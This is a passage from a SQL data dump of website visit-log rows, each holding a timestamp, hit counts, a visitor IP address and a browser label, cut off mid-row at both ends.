1580628121,1,0,1,0,'66.249.70.33',''),(478334,1580628429,1,1,0,0,'207.46.13.9','other'),(478335,1580629578,1,1,0,0,'207.46.13.231','other'),(478336,1580630569,1,1,0,0,'8.29.198.26','other'),(478337,1580631021,1,1,0,0,'37.9.113.97','other'),(478338,1580631176,1,1,0,0,'207.46.13.86','other'),(478339,1580632118,2,2,0,0,'207.46.13.9','other'),(478340,1580632671,1,1,0,0,'8.29.198.26','other'),(478341,1580633143,1,1,0,0,'207.46.13.86','other'),(478342,1580634796,1,1,0,0,'141.8.142.115','other'),(478343,1580635726,1,1,0,0,'207.46.13.231','other'),(478344,1580635883,2,2,0,0,'207.46.13.86','other'),(478345,1580636156,1,1,0,0,'207.46.13.9','other'),(478346,1580637040,1,1,0,0,'141.8.188.25','other'),(478347,1580638665,1,1,0,0,'207.46.13.86','other'),(478348,1580638819,1,1,0,0,'66.249.70.33','chrome'),(478349,1580640226,1,1,0,0,'141.8.188.39','other'),(478350,1580640751,1,1,0,0,'207.46.13.86','other'),(478351,1580641449,1,1,0,0,'8.29.198.26','other'),(478352,1580642444,1,1,0,0,'185.205.46.70','chrome'),(478353,1580642613,1,1,0,0,'109.74.154.72','chrome'),(478354,1580643130,1,1,0,0,'141.8.142.128','other'),(478355,1580643575,1,1,0,0,'8.29.198.27','other'),(478356,1580644015,1,1,0,0,'66.249.64.27','chrome'),(478357,1580644285,1,1,0,0,'87.250.224.104','other'),(478358,1580645101,1,1,0,0,'207.46.13.86','other'),(478359,1580645662,1,1,0,0,'95.158.11.121','chrome'),(478360,1580645965,1,1,0,0,'207.46.13.9','other'),(478361,1580646785,1,1,0,0,'207.46.13.231','other'),(478362,1580646823,1,1,0,0,'207.46.13.86','other'),(478363,1580647958,1,1,0,0,'66.249.64.28','chrome'),(478364,1580649143,1,1,0,0,'207.46.13.9','other'),(478365,1580649253,1,0,1,0,'157.55.39.196',''),(478366,1580649742,1,1,0,0,'66.249.64.28','chrome'),(478367,1580649830,1,1,0,0,'66.249.64.26','chrome'),(478368,1580651663,1,1,0,0,'66.249.64.27','chrome'),(478369,1580652335,1,1,0,0,'8.29.198.27','other'),(478370,1580652555,1,1,0,0,'157.55.39.196','other'),(478371,1580653295,1,1,0,0,'66.249.64.28','chrome'),(478372,1580654290,1,1,0,0,'207.46.13.231','other'),(478373,1580654488,1,1,0,0,'8.29.198.26','other'),(478374,1580654587,1,1,0,0,'207.46.13.9','other'),(478375,1580655098,1,1,0,0,'66.249.70.62','chrome'),(478376,1580655907,4,4,0,0,'207.46.13.86','other'),(478377,1580656094,2,2,0,0,'207.46.13.231','other'),(478378,1580656548,3,3,0,0,'157.55.39.196','other'),(478379,1580656944,2,2,0,0,'207.46.13.9','other'),(478380,1580657917,1,1,0,0,'87.250.224.90','other'),(478381,1580658158,1,1,0,0,'91.196.178.158','firefox'),(478382,1580658440,1,1,0,0,'95.108.213.55','other'),(478383,1580658712,1,1,0,0,'207.46.13.9','other'),(478384,1580660434,2,2,0,0,'207.46.13.86','other'),(478385,1580660657,1,1,0,0,'66.249.70.62','chrome'),(478386,1580661256,1,1,0,0,'91.196.178.185','chrome'),(478387,1580661981,1,1,0,0,'207.46.13.86','other'),(478388,1580662188,1,1,0,0,'141.8.142.161','other'),(478389,1580662279,2,0,2,0,'207.46.13.231',''),(478390,1580662427,1,1,0,0,'91.196.178.10','chrome'),(478391,1580663220,1,1,0,0,'8.29.198.27','other'),(478392,1580663301,1,1,0,0,'157.55.39.196','other'),(478393,1580663379,2,2,0,0,'207.46.13.231','other'),(478394,1580663475,1,1,0,0,'51.68.152.26','chrome'),(478395,1580665328,1,1,0,0,'95.108.213.61','other'),(478396,1580665395,1,1,0,0,'8.29.198.25','other'),(478397,1580665727,1,1,0,0,'91.196.178.83','chrome'),(478398,1580666185,1,1,0,0,'66.249.64.26','chrome'),(478399,1580667438,1,1,0,0,'207.46.13.9','other'),(478400,1580667444,1,0,1,0,'207.46.13.246',''),(478401,1580667482,1,1,0,0,'95.108.213.39','other'),(478402,1580667665,4,4,0,0,'66.249.64.26','chrome'),(478403,1580667810,1,0,1,0,'207.46.13.86',''),(478404,1580667841,1,1,0,0,'66.249.70.36','chrome'),(478405,1580667879,2,2,0,0,'66.249.64.27','chrome'),(478406,1580669488,1,1,0,0,'31.43.31.117','other'),(478407,1580669639,2,2,0,0,'207.46.13.9','other'),(478408,1580670274,1,0,1,0,'207.46.13.231',''),(478409,1580670867,2,1,1,0,'207.46.13.231',''),(478410,1580671179,1,1,0,0,'207.46.13.9','other'),(478411,1580671212,1,1,0,0,'207.46.13.86','other'),(478412,1580672117,1,1,0,0,'46.211.147.93','chrome'),(478413,1580672949,1,1,0,0,'5.255.174.141','chrome'),(478414,1580673317,1,1,0,0,'207.46.13.86','other'),(478415,1580673738,1,1,0,0,'207.46.13.231','other'),(478416,1580674092,1,1,0,0,'8.29.198.26','other'),(478417,1580674481,1,1,0,0,'66.249.64.26','chrome'),(478418,1580674692,1,1,0,0,'31.13.127.23','other'),(478419,1580674694,1,1,0,0,'31.13.127.5','other'),(478420,1580676286,1,1,0,0,'8.29.198.27','other'),(478421,1580678055,1,0,1,0,'207.46.13.86',''),(478422,1580678465,2,1,1,0,'207.46.13.86',''),(478423,1580679119,1,1,0,0,'141.8.132.28','other'),(478424,1580679820,1,1,0,0,'207.46.13.86','other'),(478425,1580679971,1,1,0,0,'207.46.13.9','other'),(478426,1580680245,1,1,0,0,'157.55.39.196','other'),(478427,1580681922,1,1,0,0,'66.249.64.26','chrome'),(478428,1580684548,1,1,0,0,'178.154.171.127','other'),(478429,1580684775,1,1,0,0,'66.249.64.26','chrome'),(478430,1580684827,2,2,0,0,'66.249.64.28','chrome'),(478431,1580684981,1,1,0,0,'8.29.198.26','other'),(478432,1580685186,6,6,0,0,'207.46.13.9','other'),(478433,1580685951,2,2,0,0,'157.55.39.196','other'),(478434,1580685986,1,1,0,0,'207.46.13.231','other'),(478435,1580686397,4,4,0,0,'207.46.13.9','other'),(478436,1580686892,1,1,0,0,'207.46.13.86','other'),(478437,1580687162,1,1,0,0,'8.29.198.25','other'),(478438,1580687201,1,1,0,0,'157.55.39.196','other'),(478439,1580687538,1,1,0,0,'178.154.171.134','other'),(478440,1580688165,2,2,0,0,'207.46.13.231','other'),(478441,1580688280,2,1,1,0,'207.46.13.86',''),(478442,1580689207,1,1,0,0,'193.110.76.2','chrome'),(478443,1580689234,2,1,1,0,'207.46.13.86',''),(478444,1580691020,1,1,0,0,'207.46.13.231','other'),(478445,1580691313,1,1,0,0,'62.205.134.182','other'),(478446,1580694997,1,1,0,0,'141.8.183.53','other'),(478447,1580695845,1,1,0,0,'8.29.198.27','other'),(478448,1580696572,2,2,0,0,'178.154.171.134','other'),(478449,1580697160,1,1,0,0,'207.46.13.9','other'),(478450,1580698010,2,2,0,0,'207.46.13.86','other'),(478451,1580698052,1,1,0,0,'8.29.198.26','other'),(478452,1580698414,1,1,0,0,'207.46.13.231','other'),(478453,1580699026,1,1,0,0,'178.154.171.134','other'),(478454,1580699467,1,1,0,0,'207.46.13.9','other'),(478455,1580701340,1,1,0,0,'178.154.171.134','other'),(478456,1580701533,1,1,0,0,'207.46.13.9','other'),(478457,1580701683,1,1,0,0,'157.55.39.196','other'),(478458,1580701811,1,1,0,0,'207.46.13.231','other'),(478459,1580703067,1,1,0,0,'207.46.13.231','other'),(478460,1580704650,2,2,0,0,'207.46.13.9','other'),(478461,1580705222,1,1,0,0,'66.249.64.26','chrome'),(478462,1580706701,1,1,0,0,'8.29.198.26','other'),(478463,1580708624,2,2,0,0,'178.154.171.134','other'),(478464,1580708779,1,1,0,0,'62.205.134.182','other'),(478465,1580708949,1,1,0,0,'8.29.198.25','other'),(478466,1580711175,1,1,0,0,'31.13.103.7','other'),(478467,1580711176,1,1,0,0,'31.13.103.12','other'),(478468,1580711177,1,1,0,0,'31.13.103.24','other'),(478471,1580712133,1,1,0,0,'207.46.13.9','other'),(478472,1580712562,1,1,0,0,'37.53.73.6','chrome'),(478473,1580713078,1,1,0,0,'207.46.13.9','other'),(478474,1580713273,1,1,0,0,'95.47.172.44','chrome'),(478475,1580714025,1,1,0,0,'66.249.64.28','chrome'),(478476,1580714244,1,1,0,0,'66.249.64.26','chrome'),(478477,1580715308,1,1,0,0,'207.46.13.231','other'),(478478,1580715842,1,1,0,0,'207.46.13.9','other'),(478479,1580716959,1,1,0,0,'141.8.183.53','other'),(478480,1580717560,1,1,0,0,'8.29.198.25','other'),(478481,1580717778,1,1,0,0,'91.196.179.138','chrome'),(478482,1580719120,1,1,0,0,'207.46.13.231','other'),(478483,1580719300,2,2,0,0,'157.55.39.196','other'),(478484,1580719486,1,1,0,0,'207.46.13.9','other'),(478485,1580719848,1,1,0,0,'8.29.198.27','other'),(478486,1580720028,1,1,0,0,'104.248.14.183','other'),(478487,1580720040,1,1,0,0,'66.249.64.28','chrome'),(478488,1580720055,1,1,0,0,'66.249.64.27','chrome'),(478489,1580720980,1,1,0,0,'91.206.111.142','chrome'),(478490,1580721278,1,1,0,0,'207.46.13.231','other'),(478491,1580722338,1,1,0,0,'18.218.192.101','chrome'),(478492,1580722695,1,1,0,0,'207.46.13.231','other'),(478493,1580722731,1,1,0,0,'91.196.178.183','chrome'),(478494,1580722801,3,3,0,0,'207.46.13.9','other'),(478495,1580723134,1,1,0,0,'52.87.155.116','other'),(478496,1580723849,1,1,0,0,'89.19.115.239','chrome'),(478497,1580724235,1,1,0,0,'207.46.13.9','other'),(478498,1580725012,1,1,0,0,'89.208.199.219','firefox'),(478499,1580725840,1,1,0,0,'165.227.116.197','other'),(478500,1580725848,1,1,0,0,'207.46.13.231','other'),(478501,1580726218,1,1,0,0,'207.46.13.9','other'),(478502,1580728431,1,1,0,0,'8.29.198.27','other'),(478503,1580728919,1,1,0,0,'157.55.39.118','other'),(478504,1580729733,1,1,0,0,'109.74.154.72','chrome'),(478505,1580730572,1,1,0,0,'66.249.64.27','chrome'),(478506,1580730757,1,1,0,0,'8.29.198.26','other'),(478507,1580732121,2,2,0,0,'157.55.39.118','other'),(478508,1580732129,2,2,0,0,'207.46.13.9','other'),(478509,1580733119,1,1,0,0,'178.93.184.167','chrome'),(478510,1580733290,1,1,0,0,'157.55.39.196','other'),(478511,1580733788,1,1,0,0,'91.196.178.106','chrome'),(478512,1580733897,1,1,0,0,'91.196.178.175','chrome'),(478513,1580733899,1,0,1,0,'157.55.39.118',''),(478514,1580734311,1,0,1,0,'207.46.13.231',''),(478515,1580734571,1,1,0,0,'66.249.64.26','chrome'),(478516,1580735932,1,1,0,0,'207.46.13.231','other'),(478517,1580737917,1,1,0,0,'95.67.72.70','chrome'),(478518,1580738575,1,1,0,0,'91.196.177.46','chrome'),(478519,1580738765,1,1,0,0,'91.196.178.84','firefox'),(478520,1580739006,1,1,0,0,'157.55.39.118','other'),(478521,1580739321,1,1,0,0,'8.29.198.27','other'),(478522,1580739322,1,1,0,0,'207.46.13.9','other'),(478523,1580739508,1,1,0,0,'91.196.177.35','chrome'),(478524,1580739601,1,1,0,0,'91.196.178.93','chrome'),(478525,1580740436,1,1,0,0,'91.196.178.106','chrome'),(478526,1580740724,2,2,0,0,'207.46.13.9','other'),(478527,1580741400,1,1,0,0,'31.41.70.9','chrome'),(478528,1580741556,1,1,0,0,'157.55.39.196','other'),(478529,1580741673,1,1,0,0,'8.29.198.26','other'),(478530,1580742577,1,1,0,0,'207.46.13.9','other'),(478531,1580743121,1,0,1,0,'157.55.39.118',''),(478532,1580743672,1,1,0,0,'157.55.39.118','other'),(478533,1580747251,1,1,0,0,'207.46.13.9','other'),(478534,1580747517,1,1,0,0,'157.55.39.118','other'),(478535,1580748301,1,1,0,0,'94.209.0.177','chrome'),(478536,1580748619,1,1,0,0,'66.249.64.26','chrome'),(478537,1580749621,1,0,1,0,'157.55.39.196',''),(478538,1580750244,1,1,0,0,'8.29.198.27','other'),(478539,1580751590,1,1,0,0,'91.196.178.84','firefox'),(478540,1580751894,2,1,1,0,'157.55.39.118',''),(478541,1580752074,2,2,0,0,'207.46.13.231','other'),(478542,1580752583,1,1,0,0,'8.29.198.25','other'),(478543,1580753338,1,1,0,0,'207.46.13.231','other'),(478544,1580753650,1,1,0,0,'157.55.39.118','other'),(478545,1580755820,1,1,0,0,'207.46.13.231','other'),(478546,1580756681,2,2,0,0,'31.13.127.3','other'),(478547,1580756682,1,1,0,0,'31.13.127.25','other'),(478549,1580757704,2,1,1,0,'157.55.39.196',''),(478550,1580757708,1,1,0,0,'157.55.39.118','other'),(478551,1580757791,1,1,0,0,'207.46.13.231','other'),(478552,1580759399,1,1,0,0,'52.87.155.116','other'),(478553,1580760832,1,1,0,0,'66.249.64.27','chrome'),(478554,1580761239,1,1,0,0,'8.29.198.27','other'),(478555,1580761594,2,2,0,0,'95.213.141.126','opera'),(478556,1580762276,1,1,0,0,'66.249.64.28','chrome'),(478557,1580762277,2,2,0,0,'207.46.13.9','other'),(478558,1580762809,1,1,0,0,'157.55.39.118','other'),(478559,1580763536,1,1,0,0,'8.29.198.25','other'),(478560,1580763908,1,1,0,0,'157.55.39.196','other'),(478561,1580765604,1,1,0,0,'207.46.13.231','other'),(478562,1580766067,2,2,0,0,'157.55.39.118','other'),(478563,1580766492,2,2,0,0,'157.55.39.196','other'),(478564,1580766829,1,1,0,0,'66.249.64.28','chrome'),(478565,1580767336,1,1,0,0,'66.249.64.27','chrome'),(478566,1580767831,2,2,0,0,'157.55.39.118','other'),(478567,1580768129,1,1,0,0,'207.46.13.9','other'),(478568,1580769283,2,2,0,0,'207.46.13.9','other'),(478569,1580769989,2,2,0,0,'178.154.171.134','other'),(478570,1580770266,1,1,0,0,'66.249.64.26','chrome'),(478571,1580770432,1,1,0,0,'93.72.127.236','other'),(478572,1580771269,2,2,0,0,'207.46.13.231','other'),(478573,1580771492,1,1,0,0,'141.8.142.2','other'),(478574,1580772179,1,1,0,0,'8.29.198.26','other'),(478575,1580773459,1,1,0,0,'157.55.39.118','other'),(478576,1580774051,1,1,0,0,'178.154.171.127','other'),(478577,1580774331,2,2,0,0,'157.230.173.0','chrome'),(478578,1580774375,1,1,0,0,'77.120.102.136','chrome'),(478579,1580774377,1,1,0,0,'212.92.116.6','chrome'),(478581,1580774378,2,2,0,0,'154.127.57.151','other'),(478582,1580774397,1,1,0,0,'81.174.176.249','chrome'),(478583,1580774399,1,1,0,0,'77.120.102.136','firefox'),(478584,1580774401,1,1,0,0,'196.52.84.17','msie'),(478585,1580774402,1,1,0,0,'84.17.42.12','chrome'),(478586,1580774426,1,1,0,0,'81.174.176.249','other'),(478587,1580774428,1,1,0,0,'154.127.57.151','chrome'),(478588,1580774460,1,1,0,0,'8.29.198.25','other'),(478589,1580774564,1,1,0,0,'207.46.13.9','other'),(478590,1580775412,1,1,0,0,'178.154.171.134','other'),(478591,1580776073,1,1,0,0,'207.46.13.9','other'),(478592,1580777546,1,1,0,0,'207.46.13.9','other'),(478593,1580777714,1,1,0,0,'62.205.134.182','other'),(478594,1580778214,2,2,0,0,'157.55.39.196','other'),(478595,1580779033,1,1,0,0,'207.46.13.9','other'),(478596,1580779525,1,1,0,0,'178.154.171.134','other'),(478597,1580779677,1,1,0,0,'88.99.2.203','other'),(478598,1580779687,7,7,0,0,'136.243.70.68','other'),(478599,1580780571,3,3,0,0,'207.46.13.231','other'),(478600,1580781555,1,1,0,0,'157.55.39.196','other'),(478601,1580782632,1,1,0,0,'178.154.171.134','other'),(478602,1580782680,2,0,2,0,'157.55.39.118',''),(478603,1580782925,1,1,0,0,'87.250.224.90','other'),(478604,1580783106,1,1,0,0,'8.29.198.27','other'),(478605,1580783296,1,1,0,0,'157.55.39.118','other'),(478606,1580783499,1,1,0,0,'207.46.13.231','other'),(478607,1580785276,1,1,0,0,'207.46.13.231','other'),(478608,1580785398,1,1,0,0,'8.29.198.25','other'),(478609,1580789728,3,3,0,0,'207.46.13.9','other'),(478610,1580790634,1,1,0,0,'157.55.39.196','other'),(478611,1580791680,1,1,0,0,'66.249.70.62','chrome'),(478612,1580792991,1,1,0,0,'207.46.13.231','other'),(478613,1580793227,1,1,0,0,'165.22.24.71','other'),(478614,1580793633,1,1,0,0,'178.154.171.134','other'),(478615,1580793858,1,1,0,0,'91.196.178.138','firefox'),(478616,1580794023,1,1,0,0,'8.29.198.27','other'),(478617,1580794981,1,1,0,0,'62.205.134.182','other'),(478618,1580795588,1,1,0,0,'207.46.13.231','other'),(478619,1580795817,1,1,0,0,'207.46.13.9','other'),(478620,1580796301,1,1,0,0,'8.29.198.25','other'),(478621,1580796723,1,1,0,0,'207.46.13.231','other'),(478622,1580798731,1,1,0,0,'66.249.64.28','chrome'),(478623,1580799110,1,1,0,0,'157.55.39.196','other'),(478624,1580799135,1,1,0,0,'157.55.39.118','other'),(478625,1580802259,1,1,0,0,'94.100.220.51','firefox'),(478626,1580803148,1,1,0,0,'141.8.183.73','other'),(478627,1580803690,1,0,1,0,'66.249.70.36',''),(478628,1580803909,1,1,0,0,'66.249.64.27','chrome'),(478629,1580804272,2,2,0,0,'193.17.44.18','chrome'),(478630,1580804940,1,1,0,0,'8.29.198.26','other'),(478631,1580805647,1,1,0,0,'207.46.13.231','other'),(478632,1580806506,1,1,0,0,'77.111.244.37','chrome'),(478633,1580806574,1,1,0,0,'178.154.171.134','other'),(478634,1580807213,1,1,0,0,'8.29.198.27','other'),(478635,1580808213,2,2,0,0,'207.46.13.231','other'),(478636,1580809935,1,1,0,0,'207.46.13.231','other'),(478637,1580809949,2,2,0,0,'178.154.171.134','other'),(478638,1580809998,1,1,0,0,'157.55.39.196','other'),(478639,1580810539,1,1,0,0,'91.196.178.178','chrome'),(478640,1580811115,1,1,0,0,'13.59.240.138','chrome'),(478641,1580812746,1,1,0,0,'157.55.39.118','other'),(478642,1580813701,2,2,0,0,'207.46.13.9','other'),(478643,1580814539,1,1,0,0,'157.55.39.196','other'),(478644,1580815487,1,1,0,0,'178.154.171.127','other'),(478645,1580815851,1,1,0,0,'8.29.198.25','other'),(478646,1580816528,1,1,0,0,'91.196.178.155','firefox'),(478647,1580816681,1,1,0,0,'109.74.154.72','chrome'),(478648,1580818160,1,1,0,0,'8.29.198.25','other'),(478649,1580818304,1,1,0,0,'207.46.13.9','other'),(478650,1580818330,2,2,0,0,'207.46.13.231','other'),(478651,1580818487,2,2,0,0,'157.55.39.196','other'),(478652,1580819652,1,1,0,0,'91.196.178.178','chrome'),(478653,1580820726,1,1,0,0,'157.55.39.118','other'),(478654,1580822037,3,3,0,0,'157.55.39.196','other'),(478655,1580822088,1,0,1,0,'157.55.39.118',''),(478656,1580822160,1,1,0,0,'157.55.39.118','other'),(478657,1580822664,1,1,0,0,'193.107.110.25','chrome'),(478658,1580823123,1,1,0,0,'91.196.178.93','chrome'),(478659,1580825008,1,1,0,0,'157.55.39.118','other'),(478660,1580826362,1,1,0,0,'213.180.203.75','other'),(478661,1580826545,1,1,0,0,'146.120.168.101','chrome'),(478662,1580826804,1,1,0,0,'8.29.198.26','other'),(478663,1580826924,1,1,0,0,'213.180.203.114','other'),(478664,1580827241,1,0,1,0,'207.46.13.231',''),(478665,1580827302,1,0,1,0,'157.55.39.196',''),(478666,1580827419,1,1,0,0,'93.94.66.0','chrome'),(478667,1580827941,1,1,0,0,'207.46.13.9','other'),(478668,1580828043,1,1,0,0,'157.55.39.118','other'),(478669,1580828071,1,1,0,0,'188.163.76.207','chrome'),(478670,1580828232,1,1,0,0,'91.196.178.93','chrome'),(478671,1580829098,1,1,0,0,'8.29.198.26','other'),(478672,1580829663,1,1,0,0,'207.46.13.9','other'),(478673,1580830609,1,0,1,0,'207.46.13.9',''),(478674,1580830815,1,1,0,0,'91.196.178.181','chrome'),(478675,1580832286,1,1,0,0,'207.46.13.231','other'),(478676,1580832675,1,1,0,0,'157.55.39.118','other'),(478677,1580832691,1,0,1,0,'207.46.13.9',''),(478678,1580832912,1,1,0,0,'46.211.236.244','chrome'),(478679,1580833405,1,1,0,0,'157.55.39.196','other'),(478680,1580833606,3,3,0,0,'213.180.203.75','other'),(478681,1580833672,1,1,0,0,'91.196.178.35','other'),(478682,1580833681,1,1,0,0,'66.249.64.26','chrome'),(478683,1580835004,1,1,0,0,'157.55.39.118','other'),(478684,1580835266,1,1,0,0,'66.249.64.26','chrome'),(478685,1580835301,1,1,0,0,'157.55.39.196','other'),(478686,1580836266,2,2,0,0,'157.55.39.196','other'),(478687,1580836482,1,1,0,0,'213.180.203.75','other'),(478688,1580836566,1,1,0,0,'146.148.25.224','chrome'),(478689,1580837366,1,1,0,0,'95.216.15.49','other'),(478690,1580837633,1,1,0,0,'69.171.251.24','other'),(478691,1580837634,1,1,0,0,'69.171.251.6','other'),(478692,1580837900,1,1,0,0,'8.29.198.26','other'),(478693,1580838983,1,1,0,0,'207.46.13.231','other'),(478694,1580839261,1,0,1,0,'157.55.39.118',''),(478695,1580839385,1,1,0,0,'213.180.203.170','other'),(478696,1580839475,1,1,0,0,'157.55.39.118','other'),(478697,1580839804,1,1,0,0,'37.139.14.90','other'),(478698,1580840049,1,1,0,0,'8.29.198.27','other'),(478699,1580840925,1,1,0,0,'213.180.203.75','other'),(478700,1580842234,1,1,0,0,'207.46.13.9','other'),(478701,1580846256,2,2,0,0,'207.46.13.9','other'),(478702,1580846663,1,1,0,0,'209.17.96.186','other'),(478703,1580847013,1,1,0,0,'157.55.39.196','other'),(478704,1580847135,1,1,0,0,'31.13.127.23','other'),(478705,1580847136,1,1,0,0,'31.13.127.7','other'),(478708,1580847413,1,0,1,0,'157.55.39.118',''),(478709,1580848209,1,1,0,0,'157.55.39.196','other'),(478710,1580848659,2,1,1,0,'207.46.13.231',''),(478711,1580848962,1,1,0,0,'8.29.198.26','other'),(478712,1580849403,3,3,0,0,'157.55.39.196','other'),(478713,1580849507,2,2,0,0,'207.46.13.9','other'),(478714,1580850614,2,2,0,0,'157.55.39.196','other'),(478715,1580850773,1,0,1,0,'207.46.13.231',''),(478716,1580851147,1,1,0,0,'8.29.198.26','other'),(478717,1580851890,1,1,0,0,'207.46.13.9','other'),(478718,1580853944,1,1,0,0,'207.46.13.9','other'),(478719,1580854895,1,1,0,0,'207.46.13.9','other'),(478720,1580856663,4,4,0,0,'207.46.13.231','other'),(478721,1580856824,1,1,0,0,'157.55.39.196','other'),(478722,1580856964,2,2,0,0,'207.46.13.9','other'),(478723,1580858996,2,2,0,0,'207.46.13.231','other'),(478724,1580859045,1,1,0,0,'207.46.13.9','other'),(478725,1580859940,1,1,0,0,'157.55.39.196','other'),(478726,1580859968,1,1,0,0,'8.29.198.25','other'),(478727,1580860106,1,1,0,0,'207.46.13.231','other'),(478728,1580860522,1,1,0,0,'157.55.39.118','other'),(478729,1580860860,1,1,0,0,'66.249.70.62','chrome'),(478730,1580861591,1,1,0,0,'157.55.39.118','other'),(478731,1580862014,1,1,0,0,'209.17.96.74','other'),(478732,1580862116,1,1,0,0,'8.29.198.26','other'),(478733,1580862265,2,2,0,0,'157.55.39.196','other'),(478734,1580862291,1,1,0,0,'207.46.13.9','other'),(478735,1580862341,1,0,1,0,'195.191.59.216',''),(478736,1580863747,1,1,0,0,'157.55.39.118','other'),(478737,1580864113,1,1,0,0,'62.205.134.182','other'),(478738,1580864925,1,1,0,0,'165.22.24.71','other'),(478739,1580865933,2,2,0,0,'157.55.39.196','other'),(478740,1580866494,1,1,0,0,'207.46.13.231','other'),(478741,1580866729,1,0,1,0,'66.249.64.28',''),(478742,1580868755,2,2,0,0,'157.55.39.118','other'),(478743,1580869030,1,1,0,0,'157.55.39.196','other'),(478744,1580869859,1,0,1,0,'207.46.13.231',''),(478745,1580869861,4,4,0,0,'207.46.13.231','other'),(478746,1580869974,3,3,0,0,'157.55.39.196','other'),(478747,1580870010,3,3,0,0,'207.46.13.9','other'),(478748,1580870020,2,2,0,0,'157.55.39.118','other'),(478749,1580870971,1,1,0,0,'8.29.198.27','other'),(478750,1580871551,1,1,0,0,'207.46.13.231','other'),(478751,1580871828,1,1,0,0,'157.55.39.118','other'),(478752,1580873066,1,1,0,0,'8.29.198.26','other'),(478753,1580873143,1,1,0,0,'157.55.39.118','other'),(478754,1580873201,1,1,0,0,'207.46.13.9','other'),(478755,1580873274,1,0,1,0,'157.55.39.196',''),(478756,1580873878,1,1,0,0,'207.46.13.231','other'),(478757,1580875126,2,2,0,0,'207.46.13.9','other'),(478758,1580875252,1,1,0,0,'157.55.39.196','other'),(478759,1580875398,1,1,0,0,'34.218.222.140','chrome'),(478760,1580875402,1,1,0,0,'35.162.70.167','other'),(478761,1580876049,2,2,0,0,'31.13.115.24','other'),(478762,1580876050,1,1,0,0,'31.13.115.12','other'),(478764,1580876856,3,3,0,0,'207.46.13.9','other'),(478765,1580876941,1,1,0,0,'157.55.39.196','other'),(478766,1580877150,2,2,0,0,'207.46.13.231','other'),(478767,1580878156,2,2,0,0,'207.46.13.9','other'),(478768,1580878521,1,1,0,0,'46.211.143.125','chrome'),(478769,1580878535,1,1,0,0,'157.55.39.118','other'),(478770,1580879097,1,1,0,0,'207.46.13.9','other'),(478771,1580879690,1,1,0,0,'213.180.203.75','other'),(478772,1580879732,1,1,0,0,'66.249.64.26','chrome'),(478773,1580881060,1,1,0,0,'213.180.203.75','other'),(478774,1580881118,1,1,0,0,'91.196.178.129','firefox'),(478775,1580881325,1,1,0,0,'62.205.134.182','other'),(478776,1580881341,1,1,0,0,'66.249.64.27','chrome'),(478777,1580881460,1,1,0,0,'66.249.64.26','chrome'),(478778,1580881952,1,1,0,0,'8.29.198.27','other'),(478779,1580882520,1,1,0,0,'213.180.203.75','other'),(478780,1580883153,1,1,0,0,'66.249.64.28','chrome'),(478781,1580883237,1,1,0,0,'207.46.13.9','other'),(478782,1580883614,1,1,0,0,'213.180.203.75','other'),(478783,1580883624,1,1,0,0,'178.154.171.134','other'),(478784,1580883677,1,1,0,0,'157.55.39.196','other'),(478785,1580884005,1,1,0,0,'8.29.198.27','other'),(478786,1580884138,1,1,0,0,'213.180.203.170','other'),(478787,1580885178,1,1,0,0,'207.46.13.231','other'),(478788,1580885500,1,1,0,0,'213.180.203.170','chrome'),(478789,1580885529,1,1,0,0,'139.59.136.84','firefox'),(478790,1580885616,3,3,0,0,'213.180.203.75','other'),(478791,1580886024,1,1,0,0,'185.183.96.122','chrome'),(478792,1580886137,2,2,0,0,'213.180.203.170','other'),(478793,1580886343,1,1,0,0,'207.46.13.231','other'),(478794,1580886351,1,1,0,0,'14.169.131.214','msie'),(478795,1580886432,1,0,1,0,'66.249.70.36',''),(478796,1580886794,1,1,0,0,'66.249.64.27','chrome'),(478797,1580887303,2,2,0,0,'213.180.203.75','other'),(478798,1580888107,1,1,0,0,'178.92.227.247','opera'),(478799,1580888808,1,1,0,0,'213.180.203.75','other'),(478800,1580888935,1,1,0,0,'66.249.70.33','chrome'),(478801,1580890720,1,0,1,0,'66.249.64.26',''),(478802,1580890868,1,1,0,0,'213.180.203.44','other'),(478803,1580891020,1,1,0,0,'207.46.13.9','other'),(478804,1580891030,1,1,0,0,'207.46.13.231','other'),(478805,1580891415,2,2,0,0,'193.17.44.18','chrome'),(478806,1580891521,1,1,0,0,'213.180.203.3','other'),(478807,1580892355,1,1,0,0,'213.180.203.41','other'),(478808,1580892407,1,1,0,0,'176.111.33.18','firefox'),(478809,1580892409,1,0,1,0,'66.249.64.26',''),(478810,1580892497,1,1,0,0,'66.249.64.28','chrome'),(478811,1580892581,1,1,0,0,'82.207.87.24','chrome'),(478812,1580893153,1,1,0,0,'8.29.198.25','other'),(478813,1580893297,1,1,0,0,'157.55.39.196','other'),(478814,1580894274,3,3,0,0,'157.55.39.196','other'),(478815,1580894950,1,1,0,0,'8.29.198.25','other'),(478816,1580895268,1,1,0,0,'213.180.203.75','other'),(478817,1580895300,1,1,0,0,'46.164.139.38','chrome'),(478818,1580895510,1,1,0,0,'18.204.247.242','chrome'),(478819,1580896114,1,1,0,0,'207.46.13.231','other'),(478820,1580896170,2,2,0,0,'23.100.18.115','firefox'),(478821,1580896215,1,1,0,0,'213.180.203.170','other'),(478822,1580896420,1,1,0,0,'207.46.13.9','other'),(478823,1580897997,2,2,0,0,'213.180.203.75','other'),(478824,1580898446,1,1,0,0,'207.46.13.9','other'),(478825,1580898734,1,1,0,0,'91.196.177.46','chrome'),(478826,1580899141,1,1,0,0,'178.154.171.134','other'),(478827,1580899146,1,1,0,0,'207.46.13.231','other'),(478828,1580900125,1,1,0,0,'207.46.13.231','other'),(478829,1580900240,1,1,0,0,'207.46.13.9','other'),(478830,1580900343,2,2,0,0,'95.213.141.126','opera'),(478831,1580900845,1,1,0,0,'213.180.203.75','other'),(478832,1580901274,1,0,1,0,'207.46.13.231',''),(478833,1580903772,1,1,0,0,'109.74.154.72','chrome'),(478834,1580904146,1,1,0,0,'207.46.13.231','other'),(478835,1580904227,1,1,0,0,'8.29.198.26','other'),(478836,1580904415,2,2,0,0,'195.230.149.30','chrome'),(478837,1580904464,1,1,0,0,'207.46.13.9','other'),(478838,1580905028,1,1,0,0,'213.180.203.75','other'),(478839,1580905930,2,2,0,0,'207.46.13.231','other'),(478840,1580905987,17,17,0,0,'138.68.1.28','firefox'),(478841,1580905992,1,1,0,0,'8.29.198.27','other'),(478842,1580906427,1,1,0,0,'207.46.13.9','other'),(478843,1580906493,1,1,0,0,'195.230.149.30','chrome'),(478844,1580906820,1,1,0,0,'37.73.231.57','chrome'),(478845,1580906838,1,1,0,0,'91.209.11.236','other'),(478846,1580907370,1,1,0,0,'66.249.64.28','chrome'),(478847,1580907579,1,1,0,0,'207.46.13.231','other'),(478848,1580907684,1,1,0,0,'198.108.66.144','other'),(478849,1580908098,1,1,0,0,'213.180.203.75','other'),(478850,15809083